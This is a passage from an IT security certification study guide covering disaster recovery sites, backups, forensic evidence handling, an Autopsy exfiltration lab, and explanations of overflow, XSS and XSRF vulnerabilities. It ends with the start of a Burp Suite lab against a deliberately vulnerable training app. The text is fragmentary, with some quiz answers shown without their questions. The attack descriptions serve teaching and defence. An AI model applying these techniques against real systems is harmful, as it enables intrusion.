then select the ones that are most appropriate for your organizational needs.
RECOVERY SITES
As you have seen, part of Continuity of Operation Planning (COOP) is to provision
fault tolerant systems that provide high availability through redundancy and failover.
This sort of well-engineered system will hopefully be resilient to most types of fault and
allow any recovery or maintenance operations to be performed in the background.
Note: Continuity of operations can also be referred to as business continuity and as
continuity of government.
Providing redundant devices and spares or configuring a server cluster on the local
network allows the redundant systems to be swapped in if existing systems fail.
Enterprise-level networks often also provide for alternate processing sites or
recovery sites. A site is another location that can provide the same (or similar) level of
service. An alternate processing site might always be available and in use, while a
recovery site might take longer to set up or only be used in an emergency.
Operations are designed to failover to the new site until the previous site can be
brought back online. Failover is a technique that ensures a redundant component,
device, application, or site can quickly and efficiently take over the functionality of an
asset that has failed. For example, load balancers provide failover in the event that one
or more servers or sites behind the load balancer are down or are taking too long to
respond. Once the load balancer detects this, it will redirect inbound traffic to an
alternate processing server or site. Thus, redundant servers in the load balancer pool
ensure there is no interruption of service.
Recovery sites are referred to as being hot, warm, or cold. A hot site can failover
almost immediately. It generally means that the site is already within the organization's
ownership and is ready to deploy. A cold site takes longer to set up (up to a week), and
a warm site is something between the two. For example, a hot site could consist of a
building with operational computer equipment that is kept updated with a live data
set. A warm site could be similar, but with the requirement that the latest data set will
need to be loaded. A cold site may be an empty building with a lease agreement in
place to install whatever equipment is required when necessary.
Clearly, providing redundancy on this scale can be very expensive. Sites are often
leased from service providers, such as Comdisco or IBM (a subscription service).
However, in the event of a nationwide emergency, demand for the services is likely to
exceed supply! Another option is for businesses to enter into reciprocal
arrangements to provide mutual support. This is cost effective but complex to plan
and set up.
Another issue is that creating a duplicate of anything doubles the complexity of
securing that resource properly. The same security procedures must apply to
redundant sites, spare systems, and backup data as apply to the main copy.
LOCATION SELECTION
Choosing the location for a processing facility or data center requires considering
multiple factors. A geographically remote site has advantages in terms of deterring and
detecting intruders. It is much easier to detect suspicious activity in a quiet, remote
environment than it is in a busy, urban one. On the other hand, a remote location
carries risks. Infrastructure (electricity, heating, water, telecommunications, and
transport links) may not be as reliable and require longer to repair. Recruitment and
retention of skilled employees can also be more difficult.
In many locations, flooding is the most commonly encountered natural disaster
hazard. Rising sea levels and changing rainfall patterns mean that previously safe areas
can become subject to flood risks within just a few years. Without spending a lot of
money on a solution, common-sense measures can be taken to minimize the impact of
flood. If possible, the computer equipment and cabling should be positioned above the
ground floor and away from major plumbing.
Certain local areas may also be subject to specific known hazards, such as
earthquakes, volcanoes, and storms. If there is no other choice as to location, natural
disaster risks such as this can often be mitigated by building designs that have been
developed to cope with local conditions.
simple to accomplish as they can use direct access RAID or local network
technologies. Site-to-site replication is considerably harder and more expensive as it
relies on Wide Area Network technologies. Synchronous replication is particularly
sensitive to distance, as the longer the communications pathway, the greater the
latency of the link. Latency can be mitigated by provisioning fiber optic links.
ORDER OF RESTORATION
If a site suffers an uncontrolled outage, in ideal circumstances processing will be
switched to the alternate site and the outage can be resolved without any service
interruption. If an alternate processing site is not available, then the main site must be
brought back online as quickly as possible to minimize service disruption. This does
not mean that the process can be rushed, however. A complex facility such as a data
center or campus network must be reconstituted according to a carefully designed
order of restoration. If systems are brought back online in an uncontrolled way, there
is the serious risk of causing additional power problems or of causing problems in the
network, OS, or application layers because dependencies between different appliances
and servers have not been met.
In very general terms, the order of restoration will be as follows:
1. Enable and test power delivery systems (grid power, Power Distribution Units
(PDUs), UPS, secondary generators, and so on).
2. Enable and test switch infrastructure, then routing appliances and systems.
3. Enable and test network security appliances (firewalls, IDS, proxies).
4. Enable and test critical network servers (DHCP, DNS, NTP, and directory services).
5. Enable and test backend and middleware (databases and business logic). Verify
data integrity.
6. Enable and test front-end applications.
7. Enable client workstations and devices and client browser access.
An alternate business practice will allow the information flow to resume to at least
some extent. A typical fallback plan is to handle transactions using pen-and-paper
systems. This type of fallback can work only if it is well planned, though. Staff must
know how to use the alternate system—what information must be captured (supply
standard forms) and to whom it should be submitted (and how, if there are no means
of electronic delivery). Alternate business practices can only work if the information
flow is well-documented and there are not too many complex dependencies on
gathering and processing the data.
As well as risks to systems, a COOP has to take on the macabre issue of human capital
resilience. Put bluntly, this means "Is someone else available to fulfill the same role if
an employee is incapacitated?" Succession planning targets the specific issue of
leadership and senior management. Most business continuity and DR plans are heavily
dependent on a few key people to take charge during the disaster and ensure that the
plan is put into effect. Succession planning ensures that these sorts of competencies
are widely available to an organization.
Performing a backup using Acronis Backup. (Screenshot used with permission from Acronis.)
For these reasons, backups are kept back to certain points in time. As backups take up
a lot of space, and there is never limitless storage capacity, this introduces the need for
storage management routines and techniques to reduce the amount of data occupying
backup storage media while giving adequate coverage of the required recovery
window. The recovery window is determined by the Recovery Point Objective (RPO),
which is determined through business continuity planning. Advanced backup software
can prevent media sets from being overwritten in line with the specified retention
policy.
Backing up a domain controller using Acronis backup—The How Long To Keep field specifies the
retention period. (Screenshot used with permission from Acronis.)
BACKUP TYPES
Utilities that support enterprise backup operations come with features to support
retention policies. They also support concepts such as media rotation. When
considering a backup made against an original copy of data, the backup can usually be
performed using one of three main types: full, incremental, and differential. In
Windows, a full backup includes all selected files and directories while incremental and
differential backups check the status of the archive attribute before including a file. The
archive attribute is set whenever a file is modified. This allows backup software to
determine which files have been changed and therefore need to be copied.
Note: Linux doesn't support a file archive attribute. Instead, a date stamp is used to
determine whether the file has changed.
Archive
Type Data Selection Backup/Restore Time Attribute
Full All selected data High/low (one tape set) Cleared
regardless of when it was
previously backed up
Incremental New files and files Low/high (multiple tape Cleared
modified since the last sets)
backup
Differential All data modified since Moderate/moderate (no Not Cleared
the last full backup more than two sets)
The criteria for determining which method to use is based on the time it takes to
restore versus the time it takes to back up. Assuming a backup is performed every
working day, an incremental backup only includes files changed during that day, while
a differential backup includes all files changed since the last full backup. Incremental
backups save backup time but can be more time-consuming when the system must be
restored. The system must be restored from the last full backup set and then from
each incremental backup that has subsequently occurred. A differential backup system
only involves two tape sets when restoration is required. Doing a full backup on a large
network every day takes a long time. A typical strategy for a complex network would be
a full weekly backup followed by an incremental or differential backup at the end
of each day.
Caution: Do not combine differential and incremental backups. Use full backups
interspersed with differential backups or full backups interspersed with incremental
backups.
Note: Most software also has the capability to do copy backups. These are made outside
the tape rotation system (ad hoc) and do not affect the archive attribute.
SNAPSHOTS
Snapshots are a means of getting around the problem of open files. If the data that
you're considering backing up is part of a database, such as SQL data or a messaging
system, such as Exchange, then the data is probably being used all the time. Often
copy-based mechanisms will be unable to back up open files. Short of closing the files,
and so too the database, a copy-based system will not work.
A snapshot is a point-in-time copy of data maintained by the file system. A backup
program can use the snapshot rather than the live data to perform the backup. In
Windows, snapshots are provided for on NTFS volumes by the Volume Shadow Copy
Service (VSS). They are also supported on Sun's ZFS file system, and under some
enterprise distributions of Linux.
Configuring VSS settings in Acronis Backup. (Screenshot used with permission from Acronis.)
Virtual system managers can usually take snapshot or cloned copies of VMs. A
snapshot remains linked to the original VM, while a clone becomes a separate VM from
the point that the cloned image was made.
As well as restoring systems, the disaster recovery plan should identify stakeholders
who need to be informed about any security incidents. There may be a legal
requirement to inform the police, fire service, or building inspectors about any safety-
related or criminal incidents. If third-party or personal data is lost or stolen, the data
subjects may need to be informed. If the disaster affects services, customers need to
be informed about the time-to-fix and any alternative arrangements that can be made.
Activity 14-4
Discussing Disaster Recovery Planning
Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Full-scale or functional exercises can identify mistakes in the plan that might not
be apparent when drafting procedures. It also helps to familiarize staff with the
plan.
Succession planning.
While definitions vary, this is typically true of cold sites only. Warm sites have
existing processing capability but not the latest data set, as hot sites would
have.
Hot sites are generally kept live with a current data set, requiring duplication of
security measures required to secure the resources, especially if the site is not
fully manned or occupied.
6. What risk is there in leasing alternate sites (as opposed to owning them)?
In the event of a widespread disaster, demand can outstrip supply. This was
sadly found to be the case in the aftermath of the 9/11 terrorist attack and the
Hurricane Katrina natural disaster.
If a site suffers a critical failure (such as complete power loss), simply switching
all the systems back on at the same time can cause additional failures (often of
greater severity). Order of restoration specifies the dependencies that must be
met before a specific part of the system is brought back online.
No. RAID mirroring provides fault tolerance in the event of a mechanical failure
of a hard drive. Backup provides protection for data in the event of volume
failure, data corruption, accidental or malicious destruction, and so on.
10. As part of its backup process, Develetech created a backup of its entire
customer records database on Monday. On Tuesday, Develetech created a
backup only from the changes made between Monday and Tuesday. On
Wednesday, Develetech created a backup only from the changes made
between Monday and Wednesday. What type of backup is Develetech doing?
Full
Incremental
Snapshot
Differential
Topic D
Summarize Basic Concepts of Forensics
EXAM OBJECTIVES COVERED
5.5 Summarize the basic concepts of forensics.
You may be called on to assist with an investigation into the details of a security
incident and to identify any perpetrators. In this topic, you'll summarize the basic
concepts of collecting and processing forensic evidence that could be used in legal
action or for strategic counterintelligence.
FORENSIC PROCEDURES
Computer forensics is the practice of collecting evidence from computer systems to a
standard that will be accepted in a court of law. It is unlikely that a computer forensic
professional will be retained by an organization, so such investigations are normally
handled by law enforcement agencies. In some cases, however, an organization may
conduct a forensic investigation without the expectation of legal action.
Law enforcement agencies will prioritize the investigation of the crime over business
continuity. This can greatly compromise the recovery process, especially in smaller
businesses, as an organization's key assets may be taken as evidence.
Like DNA or fingerprints, digital evidence—often referred to as electronically stored
information (ESI)—is mostly latent. Latent means that the evidence cannot be seen
with the naked eye; rather, it must be interpreted using a machine or process. Forensic
investigations are most likely to be launched against crimes arising from insider
threats, notably fraud or misuse of equipment (to download or store obscene material,
for instance). Prosecuting external threat sources is often extremely difficult, as the
attacker may well be in a different country or have taken effective steps to disguise his
or her location and identity. Such prosecutions are normally initiated by law
enforcement agencies, where the threat is directed against military or governmental
agencies or is linked to organized crime. Cases can take years to come to trial.
industry best practice, or there may be a litigation notice from law enforcement or
lawyers pursuing a civil action. This means that computer systems may be taken as
evidence, with all the obvious disruption to a network that entails.
A forensic examination of a device such as a hard drive that contains Electronically
Stored Information (ESI) entails a search of the whole drive (including both allocated
and unallocated sectors, for instance). eDiscovery is a means of filtering the relevant
evidence produced from all the data gathered by a forensic examination and storing it
in a database in a format such that it can be used as evidence in a trial. eDiscovery
software tools have been produced to assist this process. Some of the functions of
eDiscovery suites are:
• Identify and de-duplicate files and metadata—many files on a computer system are
"standard" installed files or copies of the same file. eDiscovery filters these types of
files, reducing the volume of data that must be analyzed.
• Search—allow investigators to locate files of interest to the case. As well as keyword
search, software might support semantic search. Semantic search matches
keywords if they correspond to a particular context.
• Security—at all points evidence must be shown to have been stored, transmitted,
and analyzed without tampering.
• Disclosure—an important part of trial procedure is that the same evidence be made
available to both plaintiff and defendant. eDiscovery can fulfill this requirement.
Recent court cases have required parties to a court case to provide searchable ESI
rather than paper records.
If possible, evidence is gathered from the live system (including screenshots of display
screens and the contents of cache and system memory) using forensic software tools.
It is vital that these tools do nothing to modify the digital data that they capture.
Note: Also consider that in-place CCTV systems or webcams might have captured
valuable evidence.
TIME OFFSET
Different OS and different file systems use different methods to identify the time at
which something occurred. The benchmark time is Coordinated Universal Time
(UTC), which is essentially the time at the Greenwich meridian. Local time is the time
within a particular time zone, which will be offset from UTC by several hours (or in
some cases, half hours). The local time offset may also vary if a seasonal daylight
saving time is in place.
NTFS uses UTC "internally" but many OS and file systems record time stamps as the
local system time. When collecting evidence, it is vital to establish how a timestamp is
calculated and note the offset between the local system time and UTC.
Forensics also needs to consider that a computer's system clock may not be properly
synchronized to a valid time source or may have been tampered with. Most computers
are configured to synchronize the clock to a Network Time Protocol (NTP) server.
Closely synchronized time is important for authentication and audit systems to work
properly. The right to modify a computer's time would normally be restricted to
administrator-level accounts (on enterprise networks) and time change events should
be logged.
HASHING UTILITIES
A critical step in the presentation of evidence will be to demonstrate that analysis has
been performed on an image of the data that is identical to the data present on the
disk and that neither data set has been tampered with. The standard means of proving
this is to create a cryptographic hash or fingerprint of the disk contents and of the
image subsequently made of it.
IMAGING UTILITIES
Once the target disk has been safely attached to the forensics workstation and verified
by generating a cryptographic hash of the contents, the next task is to use an imaging
utility to obtain a sector-by-sector copy of the disk contents (a forensic duplicate).
Forensic procedures are assisted by having an appropriate software toolkit. These are
programs that provide secure drive imaging, encryption, and data analysis. There are
commercial toolkits, such as EnCase (https://www.guidancesoftware.com/encase-
forensic) and AccessData's Forensic Toolkit (FTK) (https://accessdata.com/
products-services/forensic-toolkit-ftk), plus free software, such as Autopsy/The
Sleuth Kit (https://www.sleuthkit.org/autopsy).
PRESERVATION OF EVIDENCE
It is vital that the evidence collected at the crime scene conform to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must be
tightly controlled.
Depending on the strength of evidence required, physical drives taken from the crime
scene can be identified, bagged, sealed, and labeled (using tamper-evident bags). It is
also appropriate to ensure that the bags have anti-static shielding to reduce the
possibility that data will be damaged or corrupted on the electronic media by
ElectroStatic Discharge (ESD). Any other physical evidence deemed necessary is also
"bagged and tagged."
A crucial element of the investigation is that each step is documented and (ideally)
recorded. This proves that the evidence has been handled correctly and has not been
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 14: Explaining Risk Management and Disaster Recovery Concepts | Topic D
616 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
tampered with. Once evidence has been bagged, it must not subsequently be handled
or inspected, except in controlled circumstances. A chain of custody form records
where, when, and who collected the evidence, who subsequently handled it, and
where it was stored. The chain of custody must show access to, plus storage and
transportation of, the evidence at every point from the crime scene to the court room.
Anyone handling the evidence must sign the chain of custody and indicate what they
were doing with it.
The evidence should be stored in a secure facility; this not only means access control,
but also environmental control, so that the electronic systems are not damaged by
condensation, ESD, fire, and other hazards. Similarly, if the evidence is transported, the
transport must also be secure.
Observing artifacts generated by user activity in EnCase Forensic. (Image © 2017 Guidance Software
Inc. guidancesoftware.com/encase-forensic.)
Big Data analysis techniques can assist in this process. Big data refers to large stores
of unstructured information. Big data analysis tools use search query like functions to
identify patterns and information of interest within unstructured files such as
documents and spreadsheets.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 14: Explaining Risk Management and Disaster Recovery Concepts | Topic D
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 617
The contents of the file, plus analysis of the file metadata, including time stamps, can
reveal useful information. As well as examining the information on hard drives, big
data techniques can also be used to analyze network traffic. Big data analysis tools
oriented towards security and computer intrusion detection and forensics will certainly
become more widely available over the next few years.
Big data analysis software often includes data visualization tools. Visualization is a
very powerful analysis technique for identifying trends or unusual activity. For
example, a graph of network activity will reveal unusually high activity from a particular
host much more easily than analysis of the raw data packets. A "tag cloud" (a visual
representation of how frequently words or phrases appear in a data store) of the
information on a hard drive might reveal clues about malicious behavior that could not
be found by examining each file individually.
Third-party investigators need to keep track of the man hours spent on the
investigation and note incidental expenses as part of the billing process. The overall
cost of an incident and its investigation is important to establish to feed back into risk
assessment. It provides quantitative information about the impact of security incidents
and the value of security controls. Establishing the true cost of an incident may also be
required in a subsequent claim for compensation against the attacker.
Activity 14-5
Discussing Basic Concepts of Forensics
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
The evidence cannot be seen directly but must be interpreted so the validity of
the interpreting process must be unquestionable.
Disk imaging software to make a copy of the drive (including boot sectors and
free space) plus cryptographic software to make a hash of the drive contents.
This helps to prove that the contents of the drive have not been tampered with
by the investigator (or anyone else) since the drive was taken as evidence.
4. Why might a file time stamp not show the time at which a crime was
committed?
The time stamp may record the Universal Coordinated Time rather than the
local time. An offset would need to be applied (and it might need to be
demonstrated that the computer's time zone was correctly set).
5. You've fulfilled your role in the forensic process and now you plan on
handing the evidence over to an analysis team. What important process
should you observe during this transition, and why?
6. How might "big data" assist with a forensic examination of a computer hard
drive?
Activity 14-6
Using Forensic Tools
SCENARIO
In this activity, you will use the file carving tools provided with the open source
forensics suite Autopsy (https://www.sleuthkit.org) to interrogate a disk image. You
will open a pre-built case file and probe the information extracted to identify a data
exfiltration event. This lab is designed to test your understanding of and ability to apply
content examples in the following CompTIA Security+ objective:
• 5.5 Summarize basic concepts of forensics.
1. Open the Forensics – Marketing case in Autopsy, and browse the disk image that
has been seized as evidence.
a) Use the desktop shortcut to start Autopsy.
b) From the Welcome dialog box, select Open Case.
c) In the Open dialog box, browse to the C:\COMPTIA LABS\LABFILES\Forensics -
Marketing folder, then select Forensics - Marketing.aut and select Open.
d) When the case file loads (this may take a few seconds), select the Data Sources node
then select the marketing.vhd disk in the main pane. In the lower pane, select the
Hex tab.
This is the Master Boot Record, residing in the first 512-byte sector on the disk.
Viewing the raw disk image in Autopsy. (Screenshot used with permission from Sleuthkit.)
e) Double-click marketing.vhd to show the volumes. Select vol2. This is the system
volume and is normally hidden from view.
f) Observe that the initial string of hex characters identifies the partition type as NTFS.
Select the Strings tab.
Viewing strings extracted from the data in the boot sector of volume 2. (Screenshot used
with permission from Sleuthkit.)
g) Select vol3. This is the boot volume, hosting the OS files and applications plus user
data. Expand the folders to Users→Viral→Downloads. Observe what is shown.
There are no downloads present.
3. Viewing the timeline of file activity might also help to reconstruct the pattern of
events.
a) Select the Timeline button.
Once the database has been repopulated, a high-level chart of file activity will be
shown.
b) From the Display times in panel, select GMT/UTC.
c) Right-click the long bar for 2017 and select Zoom into Time Range. Repeat to zoom
into April and then the 29th.
Zooming into the timeline. (Screenshot used with permission from Sleuthkit.)
d) Select-and-drag on the histogram to select 1-4 pm then select the Zoom pop-up
button.
Note: If the zoom pop-up doesn't select the correct time period and you get a
No events notification, select Back and use the clock icons on the Start and
End fields to adjust the time range from 1 pm to 4 pm.
e) From the View Mode panel, select the List button. Scroll down to locate the section
containing the email message at 14:48.
Viewing a timeline of file activity. (Screenshot used with permission from Sleuthkit.)
4. Observe the following items of interest in the entries around this email.
a) Observe the prefetch records just above the email. Prefetch records are created when
a user runs an application. There is one for IE and one for an application calling itself
7z. Select 7z and view the indexed text. Note that it is using a Python programming
library extracted to a temp folder. Right-click this record and select Add File
Tag→Bookmark.
b) From reading the emails and observing the file activity, what do you think has
happened here?
The user Viral was tricked by a phishing email into visiting http://192.168.2.192 and
running a bit of malware in a file pretending to be the 7-zip compression utility. Also
note in the string that 7z.exe was in the Downloads folder, but as you saw, the
Downloads folder was empty, so it has been deleted subsequently.
c) Scroll on to 15:00 and another instance of 7z in the prefetch records. Do the strings
reveal any interaction with any type of user data file?
UniversalImport.accdb (Microsoft Access database file). All you need to know for this
scenario is that it is a sales database of commercial importance.
d) Look on a bit further and notice a whole series of files in a temp folder with the
string .7z in the file name. Right-click one and select View File in Directory. What do
you think you are looking at?
A multi-file 7-zip archive, originally written to a temp folder—but what does it contain?
e) Select the sequence of files then right-click the selection and select Extract File(s).
Select the Save button.
With the right tools it might be possible to recover the archive to find out what is
inside, though its contents could be encrypted.
f) In the Timeline window and look at the prefetch record following the sequence of .7z
files.
Viewing strings associated with a prefetch record to analyze process activity. (Screenshot
used with permission from Sleuthkit.)
This invokes 7z.dll and the file UniversalImport.accdb. At the end of the timeline, you
can see file system activity for the Downloads and Temp folders. It looks as though
the attacker used a real copy of 7zip to perform the exfiltration, attempting to cover
his or her tracks by deleting files from the disk. Fortunately, the attack wasn’t
sophisticated enough to remove evidence of the activity from the file system journal.
g) Close the Timeline window.
h) Close Autopsy.
Summary
In this lesson, you learned about the process of risk assessment and about risk
management practices, such as resiliency and automation strategies, disaster recovery,
and forensics.
• You should understand the roles of threat assessment and risk assessment in
performing Business Impact Analysis and be able to describe the common metrics
and definitions used.
• You should be able to differentiate risk response techniques and recommend
suitable mitigation for a given scenario.
• You should be able to describe the resources and processes used to implement
Continuity of Operations and disaster recovery planning.
• You should understand the use of backups, redundant components, failover
services and sites, and automated deployment technologies to implement resiliency
strategies.
• You should understand the purpose of computer forensics and the issues involved
in gathering, analyzing, and presenting Electronically Stored Information.
• Make sure you know the procedures and tools used to capture forensic evidence
from computer and network systems.
Does your organization have a formal order of restoration in place? If so, what
systems and assets are the highest priority? If not, what systems and assets
would you personally place at the highest priority?
A: Answers will vary. Depending on the nature of an adverse event, a high priority
will usually be to ensure that the overall facility is able to provide a safe working
environment. Restoring power and network connectivity is also usually a high
priority in order to ensure that key assets can run and communicate with one
another. Restoring servers, especially public-facing servers, typically takes
precedence over restoring employee-only resources like file shares and
individual workstations.
What type of alternate site(s) does your organization employ, if any? What type
of alternate site(s) would you suggest the organization employ if it doesn't
already?
A: Answers will vary, but may include a hot site, a warm site, or a cold site,
depending on the organization's needs and resources. A company that cannot
afford more than minimal IT downtime, such as a bank or airline, will probably
employ a hot site. A company that doesn't have the finances to run a hot or
warm site may choose to use a cold site instead, especially if the business
doesn't provide highly critical products and services to its customers.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Automation strategies for resiliency, disaster recovery, and incident response are just one way in
which development (programming and scripting) is gaining prominence within network
administration and operations (DevOps). More companies are having to maintain bespoke code in
customer-facing software, such as web applications. Consequently, secure application
development is a competency that will only grow in importance over the course of your career.
LESSON OBJECTIVES
In this lesson, you will:
• Summarize the risks posed by application and coding vulnerabilities and exploits.
• Summarize secure application development concepts.
Topic A
Explain the Impact of Vulnerability Types
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
1.6 Explain the impact associated with types of vulnerabilities.
In this topic, you will identify the types of attacks that target your operating systems
and other software. A software attack against the computers in your organization can
severely cripple your company's operations, and part of your job as a security
professional is to prevent that. But, as you know, you cannot protect against what you
cannot recognize. This topic will help you identify the software attacks that you will
need to be on guard against.
OVERFLOW VULNERABILITIES
Some of the general overflow vulnerabilities are discussed here. To keep up to date
with specific attack methods and new types of attack, monitor a site such as OWASP
(https://www.owasp.org/index.php/Category:Attack).
BUFFER OVERFLOW
To exploit a buffer overflow vulnerability, the attacker passes data that deliberately
overfills the buffer (an area of memory) that the application reserves to store the
expected data. There are three principal exploits:
• Stack overflow—the stack is an area of memory used by a program subroutine. It
includes a return address, which is the location of the program that called the
subroutine. An attacker could use a buffer overflow to change the return address,
allowing the attacker to run arbitrary code on the system. Two examples of this are
the Code Red worm, which targeted Microsoft's IIS web server (version 5) and the
SQLSlammer worm, which targeted Microsoft SQL Server® 2000.
• Heap overflow—a heap is an area of memory allocated by the application during
execution to store a variable of some sort. A heap overflow can overwrite those
variables, with unexpected effects. An example is a known vulnerability in
Microsoft's GDI+ processing of JPEG images.
• Array index overflow—an array is a type of variable designed to store multiple
values. It is possible to exploit unsecure code to load the array with more values
than it expects, creating an exception that could be exploited.
INTEGER OVERFLOW
An integer is a positive or negative number with no fractional component (a whole
number). Integers are widely used as a data type, where they are commonly defined
with fixed lower and upper bounds. An integer overflow attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive
number to become negative (changing a bank debit to a credit, for instance). It could
also be used where the software is calculating a buffer size; if the attacker is able to
make the buffer smaller than it should be, he or she may then be able to launch a
buffer overflow attack.
RACE CONDITIONS
Race conditions occur when the outcome from execution processes is directly
dependent on the order and timing of certain events, and those events fail to execute
in the order and timing intended by the developer. A race condition vulnerability is
typically found where multiple threads are attempting to write a variable or object at
the same memory location. Race conditions have been used as an anti-virus evasion
technique. In 2016, the Linux® kernel was discovered to have an exploitable race
condition vulnerability, known as Dirty COW (https://www.theregister.co.uk/
2016/10/21/linux_privilege_escalation_hole).
This type of vulnerability is mitigated by ensuring that a memory object is locked when
one thread is manipulating it.
POINTER DEREFERENCE
A pointer is a reference to an object at a particular memory location. Attempting to
access that memory address is called dereferencing. If the pointer has been set to a
null value (perhaps by some malicious process altering the execution environment),
this creates a null pointer type of exception and the process will crash. Programmers
can use logic statements to test that a pointer is not null before trying to use it.
MEMORY LEAK
If a process is operating correctly, when it no longer requires a block of memory, it
should release it. If the program code does not do this, it could create a situation
where the system continually leaks memory to the faulty process. This means less
memory is available to other processes and the system could crash. Memory leaks
are particularly serious in service/background applications, as they will continue to
consume memory over an extended period. Memory leaks in the OS kernel are also
extremely serious. A memory leak may itself be a sign of a malicious or corrupted
process.
APPLICATION EXPLOITS
The purpose of the attacks against application or coding vulnerabilities is to allow the
attacker to run his or her own code on the system. This is referred to as arbitrary
code execution. Where the code is transmitted from one machine to another, it is
sometimes referred to as remote code execution. The code would typically be
designed to install some sort of Trojan or to disable the system in some way (Denial of
Service).
PRIVILEGE ESCALATION
An application or process must have privileges to read and write data and execute
functions. Depending on how the software is written, a process may run using a
system account, the account of the logged-on user, or a nominated account. If a
software exploit works, the attacker may be able to execute his or her own process (a
worm or Trojan, for instance) with the same privilege level as the exploited process.
There are two main types of privilege escalation:
• Vertical privilege escalation (or elevation) is where a user or application can access
functionality or data that should not be available to them. For instance, a user might
have been originally assigned read-only access (or even no access) to certain files,
but after vertical escalation, the user can edit or even delete the files in question.
• Horizontal privilege escalation is where a user accesses functionality or data that is
intended for another user. For instance, a user might have the means to access
another user's online bank account.
TRANSITIVE ACCESS
Transitive access describes the problem of authorizing a request for a service that
depends on an intermediate service. For example, say a user orders an ebook through
some e‑commerce application on a merchant site. The merchant site processes the
order and then places a request to a publisher site to fulfill the ebook to the user.
Designing the trust relationships between these three parties is complicated:
• The merchant site could impersonate the end user to obtain publisher site services
fraudulently.
• The end user could exploit weaknesses in the merchant site to obtain unauthorized
services from the publisher site.
Note: The abbreviation XSS is used to avoid confusion with CSS (Cascading Style Sheets),
which is used to format web pages.
The attack is particularly effective not only because it breaks the browser's security
model, but also because it relies only on scripting, which is generally assumed by
browsers to be safe. The vast majority of sites use some sort of scripting and so will
not display correctly without it.
The attack described is a reflected or non-persistent XSS attack. A stored (or
persistent) XSS attack aims to insert code into a back-end database used by the
trusted site. For example, the attacker may submit a post to a bulletin board with a
malicious script embedded in the message. When other users view the message, the
malicious script is executed.
Both the attacks described exploit server-side scripts. A third type of XSS attack
exploits vulnerabilities in client-side scripts. Such scripts often use the Document
Object Model (DOM) to modify the content and layout of a web page. For example,
the "document.write" method enables a page to take some user input and modify the
page accordingly. An attacker could submit a malicious script as input and have the
page execute the script. Such exploits can be very powerful as they run with the logged
in user's privileges of the local system.
closed, or persistent, in which case they are stored on the hard drive until deleted by
the user or pass a defined expiration date. For example, if, when logging in, the user
selects the Remember Me option, then a cookie is saved and accessed the next time
they visit that web page.
Normally, a cookie can only be used by the server or domain that created it, but this
can be subverted by a Cross-Site Scripting attack. Another weakness is where cookies
are used to establish sessions in an application or for user authentication. Session IDs
are often generated using predictable patterns (such as IP address with the date and
time), making the session vulnerable to eavesdropping and possibly hijacking, by
replaying the cookie to re-establish the session.
A Cross-Site Request Forgery (XSRF) can exploit applications that use cookies to
authenticate users and track sessions. To work, the attacker must convince the victim
to start a session with the target site. The attacker must then pass an HTTP request to
the victim's browser that spoofs an action on the target site, such as changing a
password or an email address. This request could be disguised in a few ways (as an
image tag, for instance) and so could be accomplished without the victim necessarily
having to click a link. If the target site assumes that the browser is authenticated
because there is a valid session cookie and doesn't complete any additional
authorization process on the attacker's input (or if the attacker is able to spoof the
authorization), it will accept the input as genuine. This is also referred to as a confused
deputy attack (the point being that the user and the user's browser are not necessarily
the same thing).
Note: If cookies are used to store confidential information, the web application should
encrypt them before sending them to the client. If using TLS, information in a cookie
would be secure in transit but reside on the client computer in plaintext, unless it had
been separately encrypted.
Locally Shared Objects (LSOs), or Flash cookies, are data that is stored on a user's
computer by websites that use Adobe® Flash® Player. A site may be able to track a
user's browsing behavior through LSOs, causing a breach of privacy. Even if a user
wipes tracking objects from their browser, LSOs may remain on their system.
Activity 15-1
Discussing the Impact of Vulnerability
Types
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
If the integer overflow can be exploited to gain access to privileged memory, the
attacker may be able to steal information or install malware.
A process claims memory locations but never releases them, reducing the
amount of memory available to other processes. This will damage performance,
could prevent other processes from starting, and if left unchecked could crash
the OS.
Resource exhaustion.
Race condition.
Buffer overflow.
Pointer dereference.
The attacker needs to find a vulnerable input method, such as a form control or
URL or script parser, that will allow the execution of OS shell commands.
Where the attacker inserts malicious code into the back-end database used to
serve content to the trusted site.
The attacker captures some data, such as a cookie, used to log on or start a
session legitimately. The attacker then resends the captured data to re-enable
the connection.
The attacker inserts an invisible layer into a trusted web page that can intercept
or redirect input without the user realizing.
Activity 15-2
Identifying a Man-in-the-Browser
Attack
SCENARIO
An interception proxy is software that sits between a client and server (a Man-in-the-
Middle) and allows requests from the client and responses from the server to be
analyzed and modified. In this activity, you will use the interception proxy Burp Suite
(https://portswigger.net) to probe a web application for weaknesses and show how
allowing a simple script to run can compromise browser security. This activity is
designed to test your understanding of and ability to apply content examples in the
following CompTIA Security+ objective:
• 1.2 Compare and contrast types of attacks.
1. In the first part of this activity, you will see how XSS attacks take advantage of web
applications that process user input to form the HTML output in some way. There
are usually two sources of inputs:
• User typed input through a form or control.
• Parsing (interpreting) parameters from a URL.
XSS vulnerability testing on a website will consequently focus primarily on script-based
pages (such as PHP) and on forms. You will use Burp Suite to probe a user form for XSS
vulnerabilities. The form is hosted on Mutillidae, which is an intentionally vulnerable web
application created by OWASP (https://github.com/webpwnized/mutillidae).
Note: Mutillidae contains pages with language that some may find offensive. If you
are offended by bad language, please skip this activity.
a) Open the connection window for the KALI VM. Select File→Settings.
b) Select the eth0 node. In the right-hand pane, under Virtual switch, select vLOCAL.
Select OK.
c) Log on with the credentials root and Pa$$w0rd
Configuring proxy settings. (Screenshot used with permission from Mozilla Foundation.)
i) Select OK.
f) Note that nothing happens. Also note the page's file extension. PHP (PHP Hypertext
Preprocessor) is a scripting language widely used to create web applications.
With intercept active, the page request is held by the proxy until you choose to forward it.
(Screenshot used with permission from Portswigger.)
